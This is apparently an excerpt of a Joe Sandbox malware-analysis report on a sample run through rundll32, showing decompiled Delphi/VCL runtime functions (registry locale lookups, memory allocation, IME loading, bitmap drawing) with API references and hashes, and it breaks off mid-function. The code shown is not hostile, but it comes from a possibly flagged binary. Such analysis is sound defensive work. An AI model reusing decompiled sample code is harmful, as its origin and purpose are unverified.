                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D5796
                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D57B4
                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D57D2
                            • Part of subcall function 027D575C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D581B
                            • Part of subcall function 027D575C: RegQueryValueExA.ADVAPI32(?,027D59C8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001), ref: 027D5839
                            • Part of subcall function 027D575C: RegCloseKey.ADVAPI32(?,027D5868,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D585B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Open$FileModuleNameQueryValue$Close
                          • String ID:
                          • API String ID: 2796650324-0
                          • Opcode ID: 6c231b345b31c13747d350bb63c2da7179c5706e65c0d16ae7bfc64740ef4e43
                          • Instruction ID: 8dc60fced891c8286c1c1daa49b2fbb36ae1e016dd2c05faeea2648b43b2f7b0
                          • Opcode Fuzzy Hash: 6c231b345b31c13747d350bb63c2da7179c5706e65c0d16ae7bfc64740ef4e43
                          • Instruction Fuzzy Hash: 30E0ED75A002249BCF11DE5C88C4B4637E9AB08764F444951ED69CF246D371DA508BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D13D0(void* _a4) {
                          				void* _t2;
                          				char _t4;
                          				void* _t5;
                          
                          				if( *0x42d715c != 0) {
                          					_t5 =  *0x42d715c; // 0x28f0000
                          					_t4 = RtlFreeHeap(_t5, 0, _a4); // executed
                          					return _t4;
                          				}
                          				return _t2;
                          			}







                          APIs
                          • RtlFreeHeap.NTDLL(028F0000,00000000,042D1D0D,?,042D1D0D,?,?,?,?,042D2645,?,042D1ABB), ref: 042D13E9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 6a1d3964f673bd24c58ee01f065786a53b6b0936525465f94196d92dfbd572fe
                          • Instruction ID: d74b788cbbaffd30cf01999d5210b7a7ced86b7d9897ee983f76cc0ad4e5240d
                          • Opcode Fuzzy Hash: 6a1d3964f673bd24c58ee01f065786a53b6b0936525465f94196d92dfbd572fe
                          • Instruction Fuzzy Hash: C3C012317012059BD2089E89F84CBB5336DD348301F404105F60C47680C67DEC50CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D1768(signed int __eax, void** __ecx, intOrPtr __edx) {
                          				signed int _v20;
                          				void** _v24;
                          				void* _t15;
                          				void** _t16;
                          				void* _t17;
                          				signed int _t27;
                          				intOrPtr* _t29;
                          				void* _t31;
                          				intOrPtr* _t32;
                          
                          				_v24 = __ecx;
                          				 *_t32 = __edx;
                          				_t31 = __eax & 0xfffff000;
                          				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                          				 *_v24 = _t31;
                          				_t15 = _v20 - _t31;
                          				_v24[1] = _t15;
                          				_t29 =  *0x28655ec; // 0x2917b84
                          				while(_t29 != 0x28655ec) {
                          					_t7 = _t29 + 8; // 0x41d0000
                          					_t17 =  *_t7;
                          					_t8 = _t29 + 0xc; // 0x100000
                          					_t27 =  *_t8 + _t17;
                          					if(_t31 > _t17) {
                          						_t17 = _t31;
                          					}
                          					if(_t27 > _v20) {
                          						_t27 = _v20;
                          					}
                          					if(_t27 > _t17) {
                          						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                          						if(_t15 == 0) {
                          							_t16 = _v24;
                          							 *_t16 = 0;
                          							return _t16;
                          						}
                          					}
                          					_t29 =  *_t29;
                          				}
                          				return _t15;
                          			}













                          APIs
                          • VirtualAlloc.KERNEL32(041D0000,?,00001000,00000004), ref: 027D17D5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 08b3c6f18e48fbbbf72bb470b863ee9a97cc651b767493cec29e725fac1ebee6
                          • Instruction ID: f638ccc3a88029a2c6b43c2e76b176c0ed9bd867180961401306bdf70cd43407
                          • Opcode Fuzzy Hash: 08b3c6f18e48fbbbf72bb470b863ee9a97cc651b767493cec29e725fac1ebee6
                          • Instruction Fuzzy Hash: 73113CB6A056029BC310CF29D984A6ABBE6EBC4761F45C52CE59C97364D730AC40CA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027F48F8(intOrPtr _a4, intOrPtr _a8) {
                          				void* _t14;
                          				void _t15;
                          				intOrPtr _t25;
                          				char* _t26;
                          				void* _t35;
                          
                          				if( *0x286588c == 0) {
                          					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                          					_t35 = _t14;
                          					_t15 =  *0x2865888; // 0x27b0000
                          					 *_t35 = _t15;
                          					_t1 = _t35 + 4; // 0x4
                          					E027D2978(0x28635bc, 2, _t1);
                          					_t2 = _t35 + 5; // 0x5
                          					 *((intOrPtr*)(_t35 + 6)) = E027F48F0(_t2, E027F48D0);
                          					_t4 = _t35 + 0xa; // 0xa
                          					_t26 = _t4;
                          					do {
                          						 *_t26 = 0xe8;
                          						_t5 = _t35 + 4; // 0x4
                          						 *((intOrPtr*)(_t26 + 1)) = E027F48F0(_t26, _t5);
                          						 *((intOrPtr*)(_t26 + 5)) =  *0x286588c;
                          						 *0x286588c = _t26;
                          						_t26 = _t26 + 0xd;
                          					} while (_t26 - _t35 < 0xffc);
                          					 *0x2865888 = _t35;
                          				}
                          				_t25 =  *0x286588c;
                          				 *0x286588c =  *((intOrPtr*)(_t25 + 5));
                          				 *((intOrPtr*)(_t25 + 5)) = _a4;
                          				 *((intOrPtr*)(_t25 + 9)) = _a8;
                          				return  *0x286588c;
                          			}









                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 027F4916
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 28f8a588d172eb7afa4d1ffe1fb0d65a43eefac4893601e7bd2c80adf47ebcb8
                          • Instruction ID: de24eb25913a627f9cc3b090a141a886094495ac84ecf8c9cdca5eb6752b059b
                          • Opcode Fuzzy Hash: 28f8a588d172eb7afa4d1ffe1fb0d65a43eefac4893601e7bd2c80adf47ebcb8
                          • Instruction Fuzzy Hash: C41148386443459FC711DF19D884B43B7E5EB48360F10852AEA988F785D370E8158BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E02838884() {
                          				int _v8;
                          				intOrPtr _t4;
                          				struct HINSTANCE__* _t11;
                          				struct HINSTANCE__* _t13;
                          				struct HINSTANCE__* _t15;
                          				struct HINSTANCE__* _t17;
                          				struct HINSTANCE__* _t19;
                          				struct HINSTANCE__* _t21;
                          				struct HINSTANCE__* _t23;
                          				struct HINSTANCE__* _t25;
                          				struct HINSTANCE__* _t27;
                          				struct HINSTANCE__* _t29;
                          				intOrPtr _t40;
                          				intOrPtr _t42;
                          				intOrPtr _t44;
                          
                          				_t42 = _t44;
                          				_t4 =  *0x2864798; // 0x2865748
                          				if( *((char*)(_t4 + 0xc)) == 0) {
                          					return _t4;
                          				} else {
                          					_v8 = SetErrorMode(0x8000);
                          					_push(_t42);
                          					_push(0x28389ea);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t44;
                          					if( *0x2865be8 == 0) {
                          						 *0x2865be8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                          					}
                          					if( *0x2863fe8 == 0) {
                          						 *0x2863fe8 = LoadLibraryA("imm32.dll");
                          						if( *0x2863fe8 != 0) {
                          							_t11 =  *0x2863fe8; // 0x0
                          							 *0x2865bec = GetProcAddress(_t11, "ImmGetContext");
                          							_t13 =  *0x2863fe8; // 0x0
                          							 *0x2865bf0 = GetProcAddress(_t13, "ImmReleaseContext");
                          							_t15 =  *0x2863fe8; // 0x0
                          							 *0x2865bf4 = GetProcAddress(_t15, "ImmGetConversionStatus");
                          							_t17 =  *0x2863fe8; // 0x0
                          							 *0x2865bf8 = GetProcAddress(_t17, "ImmSetConversionStatus");
                          							_t19 =  *0x2863fe8; // 0x0
                          							 *0x2865bfc = GetProcAddress(_t19, "ImmSetOpenStatus");
                          							_t21 =  *0x2863fe8; // 0x0
                          							 *0x2865c00 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                          							_t23 =  *0x2863fe8; // 0x0
                          							 *0x2865c04 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                          							_t25 =  *0x2863fe8; // 0x0
                          							 *0x2865c08 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                          							_t27 =  *0x2863fe8; // 0x0
                          							 *0x2865c0c = GetProcAddress(_t27, "ImmIsIME");
                          							_t29 =  *0x2863fe8; // 0x0
                          							 *0x2865c10 = GetProcAddress(_t29, "ImmNotifyIME");
                          						}
                          					}
                          					_pop(_t40);
                          					 *[fs:eax] = _t40;
                          					_push(0x28389f1);
                          					return SetErrorMode(_v8);
                          				}
                          			}



















                          APIs
                          • SetErrorMode.KERNEL32(00008000), ref: 0283889D
                          • GetModuleHandleA.KERNEL32(USER32,00000000,028389EA,?,00008000), ref: 028388C1
                          • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 028388CE
                          • LoadLibraryA.KERNEL32(imm32.dll,00000000,028389EA,?,00008000), ref: 028388EA
                          • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0283890C
                          • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02838921
                          • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02838936
                          • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0283894B
                          • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02838960
                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02838975
                          • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0283898A
                          • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0283899F
                          • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 028389B4
                          • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 028389C9
                          • SetErrorMode.KERNEL32(?,028389F1,00008000), ref: 028389E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                          • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                          • API String ID: 3397921170-3950384806
                          • Opcode ID: b60c9e97545cff1742b49e3101c3e54d7fd02e3e60814c8e5e60c830cb73793e
                          • Instruction ID: f9ede5badae179f5ed007d9442047b4b8882b46449798a7483d43f4cdf45a159
                          • Opcode Fuzzy Hash: b60c9e97545cff1742b49e3101c3e54d7fd02e3e60814c8e5e60c830cb73793e
                          • Instruction Fuzzy Hash: E931E6BDE84240BEFB12EBA4F84DD253BBAE719B01F402855F401C7A80D67958A0CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E027FB9F8(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
                          				struct HBITMAP__* _v8;
                          				struct HPALETTE__* _v12;
                          				struct HPALETTE__* _v16;
                          				struct HPALETTE__* _v20;
                          				void* _v24;
                          				struct HDC__* _v28;
                          				struct HDC__* _v32;
                          				struct HDC__* _v36;
                          				BITMAPINFO* _v40;
                          				void* _v44;
                          				intOrPtr _v48;
                          				struct tagRGBQUAD _v52;
                          				struct HPALETTE__* _v56;
                          				intOrPtr _v116;
                          				intOrPtr _v120;
                          				intOrPtr _v132;
                          				intOrPtr _v136;
                          				void _v140;
                          				struct tagRECT _v156;
                          				void* __ebx;
                          				void* __ebp;
                          				signed short _t229;
                          				int _t281;
                          				signed int _t290;
                          				signed short _t292;
                          				struct HBRUSH__* _t366;
                          				struct HPALETTE__* _t422;
                          				signed int _t441;
                          				intOrPtr _t442;
                          				intOrPtr _t444;
                          				intOrPtr _t445;
                          				void* _t455;
                          				void* _t457;
                          				void* _t459;
                          				intOrPtr _t460;
                          
                          				_t457 = _t459;
                          				_t460 = _t459 + 0xffffff68;
                          				_push(_t419);
                          				_v16 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v20 = 0;
                          				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
                          					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
                          						E027FB5B4(_v8);
                          						_v116 = 0;
                          						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
                          							E027F87C4();
                          						}
                          						_v28 = E027F88E4(GetDC(0));
                          						_v32 = E027F88E4(CreateCompatibleDC(_v28));
                          						_push(_t457);
                          						_push(0x27fc046);
                          						_push( *[fs:edx]);
                          						 *[fs:edx] = _t460;
                          						if( *(_a8 + 0x18) >= 0x28) {
                          							_v40 = E027D277C(0x42c);
                          							_push(_t457);
                          							_push(0x27fbd50);
                          							_push( *[fs:edx]);
                          							 *[fs:edx] = _t460;
                          							 *(_a8 + 0x18) = 0x28;
                          							 *((short*)(_a8 + 0x24)) = 1;
                          							if( *(_a8 + 0x26) == 0) {
                          								_t290 = GetDeviceCaps(_v28, 0xc);
                          								_t292 = GetDeviceCaps(_v28, 0xe);
                          								_t419 = _t290 * _t292;
                          								 *(_a8 + 0x26) = _t290 * _t292;
                          							}
                          							memcpy(_v40, _a8 + 0x18, 0xa << 2);
                          							 *(_a8 + 4) =  *(_a8 + 0x1c);
                          							_t441 = _a8;
                          							 *(_t441 + 8) =  *(_a8 + 0x20);
                          							if( *(_a8 + 0x26) > 8) {
                          								_t229 =  *(_a8 + 0x26);
                          								if(_t229 == 0x10) {
                          									L30:
                          									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
                          										E027FB9AC(_a8);
                          										_t104 =  &(_v40->bmiColors); // 0x29
                          										_t441 = _t104;
                          										E027D2978(_a8 + 0x40, 0xc, _t441);
                          									}
                          								} else {
                          									_t441 = _a8;
                          									if(_t229 == 0x20) {
                          										goto L30;
                          									}
                          								}
                          							} else {
                          								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                          									if(_v16 == 0) {
                          										if(_v8 != 0) {
                          											_v24 = SelectObject(_v32, _v8);
                          											if(_v116 <= 0 || _v120 == 0) {
                          												asm("cdq");
                          												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
                          											} else {
                          												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
                          												_t441 = _a8;
                          												 *(_t441 + 0x38) = _t281;
                          											}
                          											SelectObject(_v32, _v24);
                          										}
                          									} else {
                          										_t76 =  &(_v40->bmiColors); // 0x29
                          										_t441 = _t76;
                          										E027F9078(_v16, 0xff, _t441);
                          									}
                          								} else {
                          									_t441 = 0;
                          									_v40->bmiColors = 0;
                          									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                          								}
                          							}
                          							_v20 = E027F88E4(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
                          							if(_v44 == 0) {
                          								E027F883C(_t419);
                          							}
                          							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
                          								_pop(_t442);
                          								 *[fs:eax] = _t442;
                          								_push(0x27fbd57);
                          								return E027D279C(_v40);
                          							} else {
                          								asm("cdq");
                          								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
                          								E027D3B48();
                          								E027D3B48();
                          								goto L58;
                          							}
                          						} else {
                          							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
                          								_v20 = E027F88E4(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
                          							} else {
                          								_v20 = E027F88E4(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
                          							}
                          							E027F88E4(_v20);
                          							_v24 = E027F88E4(SelectObject(_v32, _v20));
                          							_push(_t457);
                          							_push(0x27fbff7);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							_push(_t457);
                          							_push(0x27fbfe6);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							_v56 = 0;
                          							_t422 = 0;
                          							if(_v16 != 0) {
                          								_v56 = SelectPalette(_v32, _v16, 0);
                          								RealizePalette(_v32);
                          							}
                          							_push(_t457);
                          							_push(0x27fbfc4);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t460;
                          							if(_a4 == 0) {
                          								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
                          							} else {
                          								_t366 = E027F7CD8( *((intOrPtr*)(_a4 + 0x14)));
                          								E027E9BA4(0,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
                          								FillRect(_v32,  &_v156, _t366);
                          								SetTextColor(_v32, E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                          								SetBkColor(_v32, E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14)))));
                          								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
                          									_v52 = E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                          									_v48 = E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14))));
                          									SetDIBColorTable(_v32, 0, 2,  &_v52);
                          								}
                          							}
                          							if(_v8 == 0) {
                          								_pop(_t444);
                          								 *[fs:eax] = _t444;
                          								_push(0x27fbfcb);
                          								if(_v16 != 0) {
                          									return SelectPalette(_v32, _v56, 0xffffffff);
                          								}
                          								return 0;
                          							} else {
                          								_v36 = E027F88E4(CreateCompatibleDC(_v28));
                          								_push(_t457);
                          								_push(0x27fbf9a);
                          								_push( *[fs:eax]);
                          								 *[fs:eax] = _t460;
                          								_t455 = E027F88E4(SelectObject(_v36, _v8));
                          								if(_v12 != 0) {
                          									_t422 = SelectPalette(_v36, _v12, 0);
                          									RealizePalette(_v36);
                          								}
                          								if(_a4 != 0) {
                          									SetTextColor(_v36, E027F7018( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                          									SetBkColor(_v36, E027F7018(E027F7C9C( *((intOrPtr*)(_a4 + 0x14)))));
                          								}
                          								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                          								if(_v12 != 0) {
                          									SelectPalette(_v36, _t422, 0xffffffff);
                          								}
                          								E027F88E4(SelectObject(_v36, _t455));
                          								_pop(_t445);
                          								 *[fs:eax] = _t445;
                          								_push(0x27fbfa1);
                          								return DeleteDC(_v36);
                          							}
                          						}
                          					} else {
                          						goto L58;
                          					}
                          				} else {
                          					L58:
                          					return _v20;
                          				}
                          			}







































                          APIs
                          • GetObjectA.GDI32(00000000,00000054,?), ref: 027FBA78
                          • GetDC.USER32(00000000), ref: 027FBA89
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FBA9A
                          • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 027FBAE6
                          • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 027FBB0A
                          • SelectObject.GDI32(?,?), ref: 027FBD67
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027FBDA7
                          • RealizePalette.GDI32(?), ref: 027FBDB3
                          • SetTextColor.GDI32(?,00000000), ref: 027FBE1C
                          • SetBkColor.GDI32(?,00000000), ref: 027FBE36
                          • SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,027FBFC4,?,00000000,027FBFE6,?,00000000,027FBFF7), ref: 027FBE7E
                          • FillRect.USER32(?,?,00000000), ref: 027FBE04
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 027FBEA0
                          • CreateCompatibleDC.GDI32(00000028), ref: 027FBEB3
                          • SelectObject.GDI32(?,00000000), ref: 027FBED6
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027FBEF2
                          • RealizePalette.GDI32(?), ref: 027FBEFD
                          • SetTextColor.GDI32(?,00000000), ref: 027FBF1B
                          • SetBkColor.GDI32(?,00000000), ref: 027FBF35
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 027FBF5D
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027FBF6F
                          • SelectObject.GDI32(?,00000000), ref: 027FBF79
                          • DeleteDC.GDI32(?), ref: 027FBF94
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                          • String ID:
                          • API String ID: 1299887459-0
                          • Opcode ID: 6eccdbfa9623b4d5eb08f516dd36a061ee2c685990ed4fb4bf49b2710d407c0c
                          • Instruction ID: 08da6f15e5799e2d22d16a27c8d4494fa3d26f2b9db51c0d143bed55a2c6beab
                          • Opcode Fuzzy Hash: 6eccdbfa9623b4d5eb08f516dd36a061ee2c685990ed4fb4bf49b2710d407c0c
                          • Instruction Fuzzy Hash: BC12F675A04208AFDB55EFA8C889FAEB7B9EB08314F118455FA18EB350C774E941CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0281D794(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                          				struct HWND__* _v8;
                          				struct HWND__* _v12;
                          				int _v16;
                          				struct HWND__* _v20;
                          				struct HWND__* _v24;
                          				_Unknown_base(*)()* _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t192;
                          				signed int _t196;
                          				struct HWND__* _t197;
                          				struct HWND__* _t198;
                          				struct HWND__* _t210;
                          				struct HWND__* _t219;
                          				int _t222;
                          				struct HWND__* _t223;
                          				struct HWND__* _t231;
                          				struct HWND__* _t235;
                          				int _t238;
                          				int _t241;
                          				struct HWND__* _t253;
                          				struct HWND__* _t254;
                          				struct HWND__* _t259;
                          				struct HWND__* _t261;
                          				struct HWND__* _t264;
                          				struct HWND__* _t268;
                          				struct HWND__* _t276;
                          				struct HWND__* _t289;
                          				struct HWND__* _t292;
                          				struct HWND__* _t298;
                          				struct HWND__* _t299;
                          				struct HWND__* _t303;
                          				intOrPtr _t317;
                          				struct HWND__* _t320;
                          				intOrPtr* _t321;
                          				struct HWND__* _t329;
                          				struct HWND__* _t331;
                          				struct HWND__* _t342;
                          				intOrPtr* _t347;
                          				void* _t354;
                          				void* _t367;
                          				intOrPtr _t374;
                          				struct HWND__* _t379;
                          				intOrPtr _t400;
                          				void* _t401;
                          				void* _t402;
                          				void* _t403;
                          				intOrPtr _t404;
                          
                          				_t354 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_push(_t403);
                          				_push(0x281de90);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t404;
                          				 *(_v12 + 0xc) = 0;
                          				_t192 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                          				if(_t192 < 0) {
                          					L5:
                          					E0281D61C(_v8, _t351, _v12, _t401, _t402);
                          					_t196 =  *_v12;
                          					__eflags = _t196 - 0x53;
                          					if(__eflags > 0) {
                          						__eflags = _t196 - 0xb017;
                          						if(__eflags > 0) {
                          							__eflags = _t196 - 0xb020;
                          							if(__eflags > 0) {
                          								_t197 = _t196 - 0xb031;
                          								__eflags = _t197;
                          								if(_t197 == 0) {
                          									_t198 = _v12;
                          									__eflags =  *((intOrPtr*)(_t198 + 4)) - 1;
                          									if( *((intOrPtr*)(_t198 + 4)) != 1) {
                          										_t179 = _v12 + 8; // 0xfff025
                          										 *(_v8 + 0xb0) =  *_t179;
                          									} else {
                          										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                          									}
                          									L102:
                          									_pop(_t374);
                          									 *[fs:eax] = _t374;
                          									return 0;
                          								}
                          								__eflags = _t197 + 0xfffffff2 - 2;
                          								if(_t197 + 0xfffffff2 - 2 < 0) {
                          									_t111 = _v12 + 8; // 0xfff025
                          									 *(_v12 + 0xc) = E0281FB74(_v8,  *_t111,  *_v12) & 0x0000007f;
                          								} else {
                          									L101:
                          									E0281D70C(_t403);
                          								}
                          								goto L102;
                          							}
                          							if(__eflags == 0) {
                          								_t210 = _v12;
                          								__eflags =  *(_t210 + 4);
                          								if( *(_t210 + 4) != 0) {
                          									_t169 = _v12 + 8; // 0xfff025
                          									E0281E5E4(_v8, _t354,  *((intOrPtr*)( *_t169)),  *((intOrPtr*)( *_t169 + 4)));
                          								} else {
                          									_t165 = _v12 + 8; // 0xfff025
                          									E0281E56C(_v8,  *((intOrPtr*)( *_t165)),  *((intOrPtr*)( *_t165 + 4)));
                          								}
                          								goto L102;
                          							}
                          							_t219 = _t196 - 0xb01a;
                          							__eflags = _t219;
                          							if(_t219 == 0) {
                          								_t222 = IsIconic( *(_v8 + 0x30));
                          								__eflags = _t222;
                          								if(_t222 == 0) {
                          									_t223 = GetFocus();
                          									_t379 = _v8;
                          									__eflags = _t223 -  *((intOrPtr*)(_t379 + 0x30));
                          									if(_t223 ==  *((intOrPtr*)(_t379 + 0x30))) {
                          										_v24 = E028134A0(0);
                          										__eflags = _v24;
                          										if(_v24 != 0) {
                          											SetFocus(_v24);
                          										}
                          									}
                          								}
                          								goto L102;
                          							}
                          							__eflags = _t219 == 5;
                          							if(_t219 == 5) {
                          								L89:
